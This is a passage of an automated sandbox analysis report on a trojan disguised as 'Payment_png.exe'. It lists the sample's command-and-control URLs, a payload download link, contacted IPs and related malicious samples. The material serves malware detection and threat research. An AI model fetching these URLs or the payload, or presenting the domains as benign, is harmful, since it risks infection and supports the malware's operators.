uforservice.com	23.227.38.32	true	true		unknown
www.birkenhof-allgaeu.net	217.160.0.233	true	true		unknown
www.choupisson.com	66.96.160.133	true	true		unknown
www.loversdeal.com	unknown	unknown	true		unknown
www.uforservice.com	unknown	unknown	true		unknown
www.slutefuter.com	unknown	unknown	true		unknown
www.booksfall.com	unknown	unknown	true		unknown
www.plowbrothers.com	unknown	unknown	true		unknown
www.aps-mm.com	unknown	unknown	true		unknown
www.domennyarendi39.net	unknown	unknown	true		unknown
www.accinf5.com	unknown	unknown	true		unknown
www.pcpartout.com	unknown	unknown	true		unknown
www.silverdollarcafe.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.pcpartout.com/c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp	false	Avira URL Cloud: safe	unknown
http://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp	true	Avira URL Cloud: safe	unknown
http://aps-mm.com/bin_BNUtTDfY243.bin	false	Avira URL Cloud: safe	unknown
http://www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp	true	Avira URL Cloud: safe	unknown
http://www.plowbrothers.com/c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp	false	Avira URL Cloud: safe	unknown
www.booksfall.com/c8bs/	true	Avira URL Cloud: safe	low
http://www.aps-mm.com/bin_BNUtTDfY243.bin	false	Avira URL Cloud: safe	unknown
http://www.silverdollarcafe.com/c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp	false	Avira URL Cloud: safe	unknown
http://www.birkenhof-allgaeu.net/c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp	true	Avira URL Cloud: safe	unknown
http://www.uforservice.com/c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.uforservice.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aainakari.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accinf5.com/c8bs/www.silverdollarcafe.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.silverdollarcafe.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accinf5.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domennyarendi39.net/c8bs/www.accinf5.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.loversdeal.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slutefuter.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pcpartout.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.birkenhof-allgaeu.net/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.silverdollarcafe.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aainakari.com/c8bs/www.bostonm.info	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.plowbrothers.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.silverdollarcafe.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.choupisson.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.birkenhof-allgaeu.net/c8bs/www.choupisson.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.net	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.birkenhof-allgaeu.net	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.booksfall.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quantify-co.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.plowbrothers.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domentemenegi42.net	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bostonm.info/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.aainakari.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.plowbrothers.com/c8bs/www.slutefuter.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.booksfall.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domennyarendi39.net	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aainakari.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loversdeal.com/c8bs/www.booksfall.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uforservice.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uforservice.com/c8bs/www.domennyarendi39.net	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.plowbrothers.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pcpartout.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.choupisson.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.domentemenegi42.net/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.broskiusa.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.accinf5.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.domennyarendi39.net/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domennyarendi39.netReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.choupisson.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slutefuter.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.choupisson.com/c8bs/www.uforservice.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bostonm.info/c8bs/www.quantify-co.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slutefuter.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.booksfall.com/c8bs/www.pcpartout.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.broskiusa.com/c8bs/www.aainakari.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.broskiusa.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loversdeal.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.loversdeal.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.domentemenegi42.netReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bostonm.infoReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slutefuter.com/c8bs/www.loversdeal.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quantify-co.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.booksfall.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.accinf5.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcpartout.com/c8bs/	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uforservice.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.broskiusa.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcpartout.com/c8bs/www.birkenhof-allgaeu.net	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quantify-co.com/c8bs/M	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.birkenhof-allgaeu.netReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.domentemenegi42.net/c8bs/www.broskiusa.com	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bostonm.info	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quantify-co.comReferer:	explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
198.54.117.218	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
217.160.0.233	www.birkenhof-allgaeu.net	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
35.246.6.109	td-balancer-euw2-6-109.wixdns.net	United States	15169	GOOGLEUS	false
170.249.199.106	aps-mm.com	United States	63410	PRIVATESYSTEMSUS	false
34.102.136.180	plowbrothers.com	United States	15169	GOOGLEUS	false
66.96.160.133	www.choupisson.com	United States	29873	BIZLAND-SDUS	true
23.227.38.32	uforservice.com	Canada	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	377352
Start date:	29.03.2021
Start time:	13:57:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Payment_png.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/0@13/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 50.2% (good quality ratio 43.6%) Quality average: 71.5% Quality standard deviation: 33.4%
HCA Information:	Successful, ratio: 67% Number of executed functions: 141 Number of non-executed functions: 56
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 168.61.161.212, 40.88.32.150, 104.43.139.144, 184.30.20.56, 20.50.102.62, 13.88.21.125, 2.20.142.210, 2.20.142.209, 20.190.160.129, 20.190.160.71, 20.190.160.134, 20.190.160.6, 20.190.160.69, 20.190.160.4, 20.190.160.132, 20.190.160.73, 93.184.220.29, 92.122.213.194, 92.122.213.247, 172.67.184.37, 104.21.51.189, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, www.booksfall.com.cdn.cloudflare.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, ams2.current.a.prd.aadg.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.54.117.218	9tRIEZUd1j.exe	Get hash	malicious	Browse	www.thesixteenthround.net/aqu2/?5j=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7&_P=2dhtaH9
	Gt8AN6GiOD.exe	Get hash	malicious	Browse	www.boogerstv.com/p2io/?n8Ehjz3=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&JtxH=XPs0s4JPf
	27hKPHrVa3.exe	Get hash	malicious	Browse	www.boogerstv.com/p2io/?RR=YrKhZvg&rp=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM
	Payment 9.10000 USD.exe	Get hash	malicious	Browse	www.mondopeak.com/m8es/?dL3pv=B53Wf6M3JDAEan34e2a23JkFEJLcYp8ycOdfYrTy6dbNslo5+k2oC0PjjJDWZV/24+RN&BlL=8pdpXZ1po
	Fully Executed Contract.xlsx	Get hash	malicious	Browse	www.successandjoy.club/3ueg/?cFN=ErmXmMBIFtdewFC6O29iVXifVtX5lbM9ZC7kz+NOoNf32Keeuvv655T9v66BJ70e0flOVQ==&PBU=dpg8g
	Inv.exe	Get hash	malicious	Browse	www.a-zsolutionsllc.com/hko6/?NVxxVPJ=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXOfKoyPZ21p&Ch6LF=9rj0axC
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	www.washabsorber.com/gypo/?UrjPuprX=Pn910w3l5D7RPWGrIfEjN0rd6RS+9oh5xbf6ZpHI5T1fuoOy87qGtS6g2RMAOlxWqznzEw==&nnLx=UBZp3XKPefjxdB
	zMJhFzFNAz.exe	Get hash	malicious	Browse	www.mediasupernova.com/idir/?zZ0lQ0=BBXoJm4OTOHApCp3fGSy0sEyLibn+67cOqzoDset7FTIXfnJGeAyh+7pO3MSwT6mb2mV&Wzr=H2MDx8O8kJn8f
	InterTech_Inquiry.exe	Get hash	malicious	Browse	www.chelseybalassi.com/pkfa/?UjRXl6T=540ZEXgghc6Opj/C8VvmRqfXW77/Y/lS6uCB1iFiIAmIxFNNfvvrJybl+KB5y+kqtClQ&tVEp=1b60ITOxXh8hrzep
	00278943.xlsx	Get hash	malicious	Browse	www.coffreauxtissus.com/tmz/?Xrx4qhO=p1AOeEel+iKfzrJrX3ku4fFInusX5uqiRYnKoS72OyvSgvmqycsVhhJV/aISDmeQLKXuHQ==&dny8V=8p-t_j0XJnOLab
	insz.exe	Get hash	malicious	Browse	www.a-zsolutionsllc.com/hko6/?sDHh4=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p&Wr=M4nHMf1xX
	Invoice Payment Details.exe	Get hash	malicious	Browse	www.angermgmtathome.com/kio8/?PR-Hfnn=e6NOpdhu6GIIdtRIIRGR8dBI9mtGur58S+UqNMdGsY3OVbM2U6HgcHgaHzLrSTP9HxKs&Cd8t=9rJx809H6RL0Cr7
	order.exe	Get hash	malicious	Browse	www.a-zsolutionsllc.com/hko6/?X2Mt66Xx=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGUiPWZu0eDc4L90DGg==&bly=TVThefOpdDy0
	Z4bamJ91oo.exe	Get hash	malicious	Browse	www.swavhca.com/jskg/?inKP_TF0=d8LPYq+5Arayfm1vXo3Q9MeTj0bruQyaWpvdMQHKTdQ1FO0+Z34o/nFcLAzU62aITRdq&oneha=xPMpsZU8
	zISJXAAewo.exe	Get hash	malicious	Browse	www.pnorg.net/jskg/?X2JtLRIH=FFllKUI2Vy3AcuNhWrh4fKbis3luBqLkf2wubdQ4CJ+GPQXPDvWWudAI4bM3GwbQsdH4&blv=UVIpcz0pIRTp
	DOC051220-007_pdf.exe	Get hash	malicious	Browse	www.linuxquebec.net/p2he/?kjupuX=YCJF0hDOwvNF02nErBuudkBrc+0Duum5woBHTwBsJZjMMfGnyLSeEFqCGfSIlJK3ltC5&tX=AbmdQl5h9JnT7riP
	SKY POUNDS.exe	Get hash	malicious	Browse	www.allinlifestyle.club/bu43/?Ln68=FZOp3Nc8Op&KN6xW=U8sju60F1wt8yC9fXbPA8MZngBn2sAHjb+toaJCKe7zgWDnf8Ko5UEAuCgCMNpS+8k6T
	MxL5EoQS5q.exe	Get hash	malicious	Browse	www.varonaoptical.com/o56q/?-Z2hnx=+6KqlXCT/pA/oDqwzrRUswgKWTyt1bmDlyjOl0MkZgd+CYHeb4TWrlrLvZ2g9591lyoA&2d=lneha
	sSPA66WeL6.exe	Get hash	malicious	Browse	www.meditationdr.online/oj6t/?rv=lzuTRLxPWP_0Uf9&LJBpmDl=ooax6d9kW3xUtcAOZ5L/p9Ae6ZKMqd6/GEBhgmabm6VUFi57wzZvxwkikckifavWrnRM
	SOA290114.exe	Get hash	malicious	Browse	www.teamchi.club/t4vo/?pRoHnPa=Npnlt5ZtO906n53msd9G5pBOdHOEeXQyD/1EjRFLMV7cbHJomhnAcg5WDTv26ffVHF1nKseX0Q==&uZWD=XPjPaXEPSFMX8Dl
66.96.160.133	Quotation.vbs	Get hash	malicious	Browse
23.227.38.32	PO_210202.exe	Get hash	malicious	Browse	www.poshmaternityshop.com/bna/?q48=GbqTYRK82&Rxo=0pdOhhx3vWK7Q7Lm8YoccC71y0bjXEGTOkVjYQN7Ta0GPZfIAty3VohXPAcVFipZuPnz
	RTV900021234.exe	Get hash	malicious	Browse	www.recetasnutribullet.com/krc/?LZiH=ypqh5Rq0KFKhz8cp&APX87P=J1z2A29zSmQE+W9Ze7aQ8ddXOAnwBSRPiI4KZINTk+R4zZwk1f7qgz6Qd9wTP0FvZ9Af
	invoice-98726782.doc	Get hash	malicious	Browse	www.raindanceboutique.com/dhc/?9rbXut=zzr4HpmpzzF&rDHH=btD0mDeym8jPFmNHnNG5PNL07qsXtN0iT1tTTlJQ6/7+XCsQ4Nrtv8l44vI3vGz/+qlndg==
	http://highplainsprospectors.com	Get hash	malicious	Browse	highplainsprospectors.com/
	formbook_payload.exe	Get hash	malicious	Browse	www.slothzzz.com/agwz/?LZND0=Nm1g+Cr7PxAWjMuG/lXz57InbucQImWyPlJ6lo+2AgUBGhOlnrczzCcW0Z0mOFR6lVtp&MnZ=GXLtz
	Payment Advice-Advice Ref G5008785.exe	Get hash	malicious	Browse	www.studiopenelope.com/xwqs/?QZ0=WVDUogDEkjeTkhL47EcHvrDOQUKuFjT9gGueqdK9+OeWDBHmmQ122+i+Yz7OfF3QkzRV&3fvh=hpvTRRlHj2-lYncP
	900821.exe	Get hash	malicious	Browse	brilliantk9.com/robots.txt
	65history.486.js.js.js	Get hash	malicious	Browse	alefjudaica.com/h70j1sxj
	http://lightpack.tv/wp-content/PrismatikSetup_6.0.0.exe	Get hash	malicious	Browse	lightpack.tv/wp-content/PrismatikSetup_6.0.0.exe
	http://stateandfederalposter.com/	Get hash	malicious	Browse	stateandfederalposter.com/
	21Order,docx.exe	Get hash	malicious	Browse	www.scrunchie.biz/hx336/?at1h=N3vM61B0qGDaf+c7iTDHeuZBuEcYSiMBRHN3hkh2c/L+ffuwZStILfrM16BWKmlA09s3QjwyjuT2cEM/dLfO&A8D0=AnadWXNhlZdl5P

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	salescontractv2draft.exe	Get hash	malicious	Browse	198.54.117.210
	rErRI1Ktbf.exe	Get hash	malicious	Browse	198.54.117.210
	9tRIEZUd1j.exe	Get hash	malicious	Browse	198.54.117.218
	Gt8AN6GiOD.exe	Get hash	malicious	Browse	198.54.117.218
	2pA9qt1vU4.exe	Get hash	malicious	Browse	198.54.117.215
	1LHKlbcoW3.exe	Get hash	malicious	Browse	198.54.117.212
	NEW ORDER 3742.exe	Get hash	malicious	Browse	198.54.117.211
	PO# 4510175687.exe	Get hash	malicious	Browse	198.54.117.212
	kAO6QPQsZF.exe	Get hash	malicious	Browse	198.54.117.210
	LrJiu5vv1t.exe	Get hash	malicious	Browse	198.54.117.212
	27hKPHrVa3.exe	Get hash	malicious	Browse	198.54.117.218
	Payment 9.10000 USD.exe	Get hash	malicious	Browse	198.54.117.218
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	198.54.117.215
	RFQ00787676545654300RITEC.doc	Get hash	malicious	Browse	198.54.117.217
	Fully Executed Contract.xlsx	Get hash	malicious	Browse	198.54.117.218
	2021_03_16.exe	Get hash	malicious	Browse	198.54.117.217
	order samples 056-062 _pdf.exe	Get hash	malicious	Browse	198.54.117.216
	Gv8Zd3cf8H.exe	Get hash	malicious	Browse	198.54.117.212
	yxQWzvifFe.exe	Get hash	malicious	Browse	198.54.117.210
	E2qMfhH57G.exe	Get hash	malicious	Browse	198.54.117.215

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
